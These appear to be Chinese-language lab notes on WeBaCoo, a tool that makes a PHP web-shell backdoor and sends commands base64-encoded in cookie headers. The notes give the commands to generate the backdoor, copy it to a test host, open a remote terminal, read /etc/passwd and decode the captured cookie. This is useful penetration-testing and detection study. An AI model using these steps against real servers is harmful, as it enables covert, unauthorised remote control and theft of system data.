WeBaCoo (Web Backdoor Cookie)
简介
类终端的shell,只针对 PHP
编码通信内容通过 cookie 头传输,隐蔽性较强
Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
cm:bash64 编码之后的命令
cn:服务器用于返回数据的 cookie 头的名
cp:返回信息定界符
生成服务器端
webacoo -g -o webacoo.php
-g Generate backdoor code (-o is required)
-o OUTPUT Generated backdoor output filename
root@kali:~# scp webacoo.php msfadmin@192.168.199.158:/home/msfadmin/
拷贝webshell进web目录
注:将文件拷贝到目标机器除了使用scp还可以使用如下web方式
php -S 0.0.0.0:80 -t /root
python -m SimpleHttpServer 80
客户端端连接
webacoo -t -u http://10.10.10.132/webacoo.php
-t Establish remote “terminal” connection (-u is required)
-u URL Backdoor URL
cat /etc/passwd
通过 cookie 进行传输,抓包分析
Cookie: cm=Y2F0IC9ldGMvcGFzc3dk; cn=M-cookie; cp=5so!
cm:bash64 编码之后的命令
cn:服务器用于返回数据的 cookie 头的名
cp:返回信息定界符
解码查看
Cookie: cm=Y2F0IC9ldGMvcGFzc3dk; cn=M-cookie; cp=5so!
root@kali:~# echo Y2F0IC9ldGMvcGFzc3dk | base64 -d
cat /etc/passwd # 刚才在控制端执行的命令
正在上传…